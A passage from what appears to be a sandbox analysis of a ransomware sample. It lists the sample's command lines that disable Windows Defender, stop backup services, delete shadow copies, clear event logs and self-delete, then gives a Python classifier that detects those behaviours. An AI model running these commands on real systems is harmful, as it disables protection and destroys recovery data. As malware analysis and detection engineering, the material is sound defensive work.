        cmd: C:\Windows\system32\net1 stop "UI0Detect" /y
  [2] C:\Windows\SysWOW64\net.exe (PID 4384)
      cmd: net.exe stop "vmicvss" /y
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\SysWOW64\net1.exe (PID 4436)
        cmd: C:\Windows\system32\net1 stop "vmicvss" /y
  [2] C:\Windows\SysWOW64\net.exe (PID 4336)
      cmd: net.exe stop "VSS" /y
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\SysWOW64\net1.exe (PID 3228)
        cmd: C:\Windows\system32\net1 stop "VSS" /y
  [2] C:\Windows\SysWOW64\net.exe (PID 3784)
      cmd: net.exe stop "wbengine" /y
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\SysWOW64\net1.exe (PID 4508)
        cmd: C:\Windows\system32\net1 stop "wbengine" /y
  [2] C:\Windows\SysWOW64\net.exe (PID 4512)
      cmd: net.exe stop "WebClient" /y
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\SysWOW64\net1.exe (PID 452)
        cmd: C:\Windows\system32\net1 stop "WebClient" /y
  [2] C:\Windows\SysWOW64\net.exe (PID 612)
      cmd: net.exe stop "UnistoreSvc_1643c" /y
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\SysWOW64\net1.exe (PID 840)
        cmd: C:\Windows\system32\net1 stop "UnistoreSvc_1643c" /y
  [2] C:\Windows\SysWOW64\sc.exe (PID 432)
      cmd: sc.exe config "SamSs" start= disabled
  [2] C:\Windows\SysWOW64\sc.exe (PID 1116)
      cmd: sc.exe config "SDRSVC" start= disabled
  [2] C:\Windows\SysWOW64\sc.exe (PID 1280)
      cmd: sc.exe config "SstpSvc" start= disabled
  [2] C:\Windows\SysWOW64\sc.exe (PID 1508)
      cmd: sc.exe config "UI0Detect" start= disabled
  [2] C:\Windows\SysWOW64\sc.exe (PID 1712)
      cmd: sc.exe config "vmicvss" start= disabled
  [2] C:\Windows\SysWOW64\sc.exe (PID 1920)
      cmd: sc.exe config "VSS" start= disabled
  [2] C:\Windows\SysWOW64\sc.exe (PID 2232)
      cmd: sc.exe config "wbengine" start= disabled
  [2] C:\Windows\SysWOW64\sc.exe (PID 2404)
      cmd: sc.exe config "WebClient" start= disabled
  [2] C:\Windows\SysWOW64\sc.exe (PID 2648)
      cmd: sc.exe config "UnistoreSvc_1643c" start= disabled
  [2] C:\Windows\SysWOW64\reg.exe (PID 3008)
      cmd: reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
  [2] C:\Windows\SysWOW64\reg.exe (PID 3812)
      cmd: reg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
  [2] C:\Windows\SysWOW64\reg.exe (PID 4520)
      cmd: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
  [2] C:\Windows\SysWOW64\reg.exe (PID 4784)
      cmd: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
  [2] C:\Windows\SysWOW64\reg.exe (PID 4888)
      cmd: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
  [2] C:\Windows\SysWOW64\reg.exe (PID 4664)
      cmd: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
  [2] C:\Windows\SysWOW64\reg.exe (PID 2896)
      cmd: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
  [2] C:\Windows\SysWOW64\reg.exe (PID 4916)
      cmd: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
  [2] C:\Windows\SysWOW64\reg.exe (PID 4564)
      cmd: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
  [2] C:\Windows\SysWOW64\reg.exe (PID 4600)
      cmd: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
  [2] C:\Windows\SysWOW64\reg.exe (PID 4884)
      cmd: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
  [2] C:\Windows\SysWOW64\reg.exe (PID 5024)
      cmd: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
  [2] C:\Windows\SysWOW64\reg.exe (PID 1100)
      cmd: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
  [2] C:\Windows\SysWOW64\reg.exe (PID 2196)
      cmd: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f
  [2] C:\Windows\SysWOW64\reg.exe (PID 736)
      cmd: reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
  [2] C:\Windows\SysWOW64\reg.exe (PID 4956)
      cmd: reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
  [2] C:\Windows\SysWOW64\schtasks.exe (PID 4828)
      cmd: schtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
  [2] C:\Windows\SysWOW64\schtasks.exe (PID 712)
      cmd: schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
  [2] C:\Windows\SysWOW64\schtasks.exe (PID 1108)
      cmd: schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
  [2] C:\Windows\SysWOW64\schtasks.exe (PID 1240)
      cmd: schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
  [2] C:\Windows\SysWOW64\schtasks.exe (PID 2952)
      cmd: schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
  [2] C:\Windows\SysWOW64\reg.exe (PID 1824)
      cmd: reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f
  [2] C:\Windows\SysWOW64\reg.exe (PID 1940)
      cmd: reg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f
  [2] C:\Windows\SysWOW64\reg.exe (PID 2244)
      cmd: reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f
  [2] C:\Windows\SysWOW64\reg.exe (PID 2736)
      cmd: reg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
      - Modifies registry class
  [2] C:\Windows\SysWOW64\reg.exe (PID 3324)
      cmd: reg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
      - Modifies registry class
  [2] C:\Windows\SysWOW64\reg.exe (PID 4672)
      cmd: reg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
      - Modifies registry class
  [2] C:\Windows\SysWOW64\reg.exe (PID 332)
      cmd: reg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
  [2] C:\Windows\SysWOW64\reg.exe (PID 2668)
      cmd: reg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
  [2] C:\Windows\SysWOW64\reg.exe (PID 3732)
      cmd: reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
  [2] C:\Windows\SysWOW64\reg.exe (PID 3264)
      cmd: reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
  [2] C:\Windows\SysWOW64\reg.exe (PID 4116)
      cmd: reg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
      - Modifies security service
  [2] C:\Windows\SysWOW64\reg.exe (PID 3444)
      cmd: reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
  [2] C:\Windows\SysWOW64\vssadmin.exe (PID 3652)
      cmd: vssadmin.exe delete shadows /all /quiet
      - Interacts with shadow copies
  [2] C:\Windows\SysWOW64\wevtutil.exe (PID 4064)
      cmd: wevtutil.exe cl system
      - Suspicious use of AdjustPrivilegeToken
  [2] C:\Windows\SysWOW64\wevtutil.exe (PID 3192)
      cmd: wevtutil.exe cl security
      - Suspicious use of AdjustPrivilegeToken
  [2] C:\Windows\SysWOW64\wevtutil.exe (PID 4176)
      cmd: wevtutil.exe cl application
      - Suspicious use of AdjustPrivilegeToken
  [2] C:\Windows\SysWOW64\Wbem\wmic.exe (PID 4172)
      cmd: wmic.exe SHADOWCOPY /nointeractive
      - Suspicious use of AdjustPrivilegeToken
  [2] C:\Windows\SysWOW64\Wbem\wmic.exe (PID 4344)
      cmd: wmic.exe shadowcopy delete
      - Suspicious use of AdjustPrivilegeToken
  [2] C:\Windows\SysWOW64\cmd.exe (PID 3228)
      cmd: cmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
    [3] C:\Program Files\Windows Defender\MpCmdRun.exe (PID 4504)
        cmd: "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
        - Deletes Windows Defender Definitions
  [2] C:\Windows\SysWOW64\cmd.exe (PID 4232)
      cmd: cmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true
    [3] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 3320)
        cmd: powershell Set-MpPreference -DisableIOAVProtection $true
        - Suspicious behavior: EnumeratesProcesses
  [2] C:\Windows\SysWOW64\cmd.exe (PID 4088)
      cmd: cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true
    [3] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 2868)
        cmd: powershell Set-MpPreference -DisableRealtimeMonitoring $true
        - Suspicious behavior: EnumeratesProcesses
  [2] C:\Windows\SysWOW64\notepad.exe (PID 616)
      cmd: notepad.exe C:\iotb_HOW_TO_DECRYPT.txt
      - Opens file in notepad (likely ransom note)
  [2] C:\Windows\SysWOW64\cmd.exe (PID 4240)
      cmd: cmd.exe /D /C ping.exe -n 5 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe"
    [3] C:\Windows\SysWOW64\PING.EXE (PID 2696)
        cmd: ping.exe -n 5 127.0.0.1
        - Runs ping.exe
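The process tree above is a single pre-encryption procedure: stop and disable backup-related services (net stop / sc config), neuter Defender through policy keys, service Start values, scheduled tasks, definition removal and Set-MpPreference, destroy shadow copies, clear the event logs, and finally self-delete behind a ping delay. As an added example, not part of this sandbox report or of the Hive sample, the Python below classifies process-creation command lines into those behaviours and maps them to ATT&CK techniques, which is the shape of detection logic a SOC would run over Sysmon event 1 or Security 4688 command lines. The service names are taken from the tree above; the sample command lines are constructed to mirror it (including two benign controls); the verdict thresholds are an assumption.

```python
import re
from collections import Counter

# Added example; not part of the sandbox report or of the Hive sample.
# Service names are the ones the sample stopped/disabled in the tree above.
# UnistoreSvc carries a per-user suffix (UnistoreSvc_1643c), so it is folded to one key.
RECOVERY_SERVICES = {"samss", "sdrsvc", "sstpsvc", "ui0detect", "vmicvss",
                     "vss", "wbengine", "webclient", "unistoresvc"}
# Defender services/drivers whose Start value the sample set to 4 (disabled).
DEFENDER_SERVICES = {"windefend", "wdboot", "wdfilter", "wdnisdrv", "wdnissvc",
                     "securityhealthservice"}


def _svc(raw):
    """Normalise a (possibly quoted) service name taken from a command line."""
    name = raw.strip('"').lower()
    return "unistoresvc" if name.startswith("unistoresvc_") else name


# (behaviour, ATT&CK technique, pattern, optional predicate on the match)
RULES = [
    ("recovery_service_stop", "T1489",
     re.compile(r'\bnet1?(?:\.exe)?\s+stop\s+("?[^"\s]+"?)', re.I),
     lambda m: _svc(m.group(1)) in RECOVERY_SERVICES),
    ("recovery_service_disabled", "T1489",
     re.compile(r'\bsc(?:\.exe)?\s+config\s+("?[^"\s]+"?)\s+start=\s*disabled', re.I),
     lambda m: _svc(m.group(1)) in RECOVERY_SERVICES),
    ("defender_policy_tamper", "T1562.001",
     re.compile(r'\breg(?:\.exe)?\s+(?:add|delete)\s+"HKLM\\Software\\Policies\\Microsoft\\Windows Defender', re.I),
     None),
    ("defender_service_disabled", "T1562.001",
     re.compile(r'\breg(?:\.exe)?\s+add\s+"HKLM\\System\\CurrentControlSet\\Services\\([^"\\]+)"'
                r'\s+/v\s+"Start"\s+/t\s+REG_DWORD\s+/d\s+"4"', re.I),
     lambda m: m.group(1).lower() in DEFENDER_SERVICES),
    ("defender_task_disabled", "T1562.001",
     re.compile(r'\bschtasks(?:\.exe)?\s+/Change\s+/TN\s+"[^"]*(?:Windows Defender|ExploitGuard)[^"]*"\s+/Disable', re.I),
     None),
    ("defender_definitions_removed", "T1562.001",
     re.compile(r'MpCmdRun\.exe"?\s+-RemoveDefinitions', re.I), None),
    ("defender_preference_disabled", "T1562.001",
     re.compile(r'Set-MpPreference\s+-Disable\w+\s+\$true', re.I), None),
    ("shadow_copy_deleted", "T1490",
     re.compile(r'\bvssadmin(?:\.exe)?\s+delete\s+shadows|\bwmic(?:\.exe)?\s+shadowcopy\s+delete', re.I),
     None),
    ("event_log_cleared", "T1070.001",
     re.compile(r'\bwevtutil(?:\.exe)?\s+cl\s+\S+', re.I), None),
    ("self_delete_via_ping", "T1070.004",
     re.compile(r'\bping(?:\.exe)?\s+-n\s+\d+\s+127\.0\.0\.1\s*&&\s*del\s+', re.I), None),
]


def classify(cmdline):
    """Return the (behaviour, technique) pairs one command line triggers."""
    hits = []
    for name, technique, pattern, predicate in RULES:
        m = pattern.search(cmdline)
        if m and (predicate is None or predicate(m)):
            hits.append((name, technique))
    return hits


def summarize(cmdlines):
    """Count behaviours over a whole process tree; returns (Counter, set of techniques)."""
    counts, techniques = Counter(), set()
    for line in cmdlines:
        for name, technique in classify(line):
            counts[name] += 1
            techniques.add(technique)
    return counts, techniques


def verdict(counts):
    """Heuristic (an assumption, not from the report): AV tampering combined with
    destruction of recovery points is the pre-encryption pattern seen above."""
    defender = any(k.startswith("defender_") for k in counts)
    recovery = any(k.startswith("recovery_") or k == "shadow_copy_deleted" for k in counts)
    if defender and recovery:
        return "ransomware-precursor"
    return "suspicious" if (defender or recovery) else "none"


# Constructed sample, mirroring the tree above; the last two lines are benign controls.
SAMPLE_COMMAND_LINES = [
    'net.exe stop "VSS" /y',
    'net.exe stop "wbengine" /y',
    'C:\\Windows\\system32\\net1 stop "UnistoreSvc_1643c" /y',
    'sc.exe config "VSS" start= disabled',
    'reg.exe add "HKLM\\Software\\Policies\\Microsoft\\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f',
    'reg.exe add "HKLM\\System\\CurrentControlSet\\Services\\WinDefend" /v "Start" /t REG_DWORD /d "4" /f',
    'schtasks.exe /Change /TN "Microsoft\\Windows\\Windows Defender\\Windows Defender Scheduled Scan" /Disable',
    'vssadmin.exe delete shadows /all /quiet',
    'wmic.exe shadowcopy delete',
    'wevtutil.exe cl security',
    '"C:\\Program Files\\Windows Defender\\MpCmdRun.exe" -RemoveDefinitions -All',
    'powershell Set-MpPreference -DisableRealtimeMonitoring $true',
    'cmd.exe /D /C ping.exe -n 5 127.0.0.1 && del "C:\\Users\\Admin\\AppData\\Local\\Temp\\sample.exe"',
    'net.exe stop "Spooler" /y',
    'ping.exe -n 5 127.0.0.1',
]

if __name__ == "__main__":
    counts, techniques = summarize(SAMPLE_COMMAND_LINES)
    for name, n in counts.most_common():
        print(f"{n:2d}  {name}")
    print("techniques:", ", ".join(sorted(techniques)))
    print("verdict:", verdict(counts))
```

The two benign controls matter: "net stop" on an arbitrary service and a bare ping loop are routine on real hosts, so the rules key on the specific backup/VSS/Defender services and on the ping-then-del chain rather than on the binaries alone. In production the same rules would run over the parent-child chain (a single PID spawning dozens of net, sc and reg children) rather than over isolated lines.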
Network
MITRE ATT&CK Enterprise v6
Downloads
-
MD5 1c19c16e21c97ed42d5beabc93391fc5
SHA1 8ad83f8e0b3acf8dfbbf87931e41f0d664c4df68
SHA256 1bcd97396c83babfe6c5068ba590d7a3f8b70e72955a9d1e4070648e404cbf05
SHA512 7d18776d8f649b3d29c182ff03efc6cea8b527542ee55304980f24577aae8b64e37044407776e220984346c3998ace5f8853afa58c8b38407482a728e9495e0c
-
MD5 932fbbcec97a66cb6d8b534b3adcb522
SHA1 4b4e0903311f976910faf1ad20e79a1fd258d70e
SHA256 15a4ba93d79fe7fe5ae613f220df3c078a346279c46b013142827489aab25101
SHA512 3e150fa1e954b3a8bad6b72c0025eb89f2c121271da9e2c6d3f941c389f5f419394d98b1b8e0d729abd1b05e8bd243838e15cdec3e1e4c64ea28ccf84177e4e5